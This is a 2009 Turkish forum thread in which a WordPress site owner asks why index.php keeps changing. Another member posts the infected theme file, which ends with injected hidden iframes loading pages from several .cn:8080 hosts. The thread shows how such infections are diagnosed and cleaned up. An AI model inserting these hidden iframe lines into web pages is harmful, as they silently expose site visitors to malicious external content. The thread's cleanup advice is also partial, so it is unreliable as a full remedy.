• 19-06-2009, 11:20:19
    #1
    Selam arkadaslar, konu yeri uygunmu bilmiyorum..
    Sorunuma geleyim: ben word press kullanıyorum ara sıra index.php ve default.filters php değişiyor.. 17.satır değisiyor sürekli.. Bunun nedeni ne olabilir aceba? Yardımcı olabilirmisiniz..
  • 19-06-2009, 11:25:38
    #2
    Üyeliği durduruldu
    Nasıl değişiyor :S

    Kullandığın temada sorun olabilir mi?
  • 19-06-2009, 11:28:05
    #3
    Bilmiyorum hocam gercekten, o index.php'ler değisiyor, ben tekrar yenilerini atıyorum ancak o sekilde düzeltebiliyorum.. Sabit bi sekilde index kalmıyor yani, bu yüzden googlede bi gün sıkıntı yaratıcak..
  • 19-06-2009, 11:35:17
    #4
    iframe virüsü olabilir sayfa başka siteyemi yönleniyor
  • 19-06-2009, 11:38:19
    #5
    Hayır sayfa yönlenmiyor. Sadece index.php değişiyor. Örneğin ;

    Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/mirctrb/public_html/index.php on line 17

    Parse error: syntax error, unexpected '.' in /home/mirctrb/public_html/index.php on line 17
  • 19-06-2009, 12:24:36
    #6
    <?php
    /**
    * @package WordPress
    * @subpackage Classic_Theme
    */
    get_header();
    ?>

    <?php if (have_posts()) : while (have_posts()) : the_post(); ?>

    <?php the_date('','<h2>','</h2>'); ?>

    <div <?php post_class() ?> id="post-<?php the_ID(); ?>">
    <h3 class="storytitle"><a href="<?php the_permalink() ?>" rel="bookmark"><?php the_title(); ?></a></h3>
    <div class="meta"><?php _e("Filed under:"); ?> <?php the_category(',') ?> — <?php the_tags(__('Tags: '), ', ', ' — '); ?> <?php the_author() ?> @ <?php the_time() ?> <?php edit_post_link(__('Edit This')); ?></div>

    <div class="storycontent">
    <?php the_content(__('(more...)')); ?>
    </div>

    <div class="feedback">
    <?php wp_link_pages(); ?>
    <?php comments_popup_link(__('Comments (0)'), __('Comments (1)'), __('Comments (%)')); ?>
    </div>

    </div>

    <?php comments_template(); // Get wp-comments.php template ?>

    <?php endwhile; else: ?>
    <p><?php _e('Sorry, no posts matched your criteria.'); ?></p>
    <?php endif; ?>

    <?php posts_nav_link(' — ', __('&laquo; Newer Posts'), __('Older Posts &raquo
    <iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi58" width=125 height=125 st
    <iframe src="http://shopvideocommission.cn:8080/index.php" width=110 height=105 s
    <iframe src="http://bigbestlite.cn:8080/index.php" width=132 height=144
    <iframe src="http://gianttopnano.cn:8080/index.php" width=145 height=194
    <iframe src="http://yourlotcar.cn:8080/index.php" width=174 height=165 style="visibility: hidden"></iframe>

    arkadasım sanırım cözüm bu :S temanın icerisnden bu cıktı index.php ile
  • 19-06-2009, 12:27:25
    #7
    iframe var onlari silersen düzelecektir.
  • 19-06-2009, 12:34:10
    #8
    Eğer bu tarz bir sorunla karsılasan arkadaslar olursa, wp-admin | themes, plugins, languages dosyalarının içerisinde ki, index.php'yi silerse aktif bi sekilde sitesi islev görmeye devam eder. Yardımcı olmaya calısan arkadaslar sağolsunlar..
    Herkese iyi calısmalar.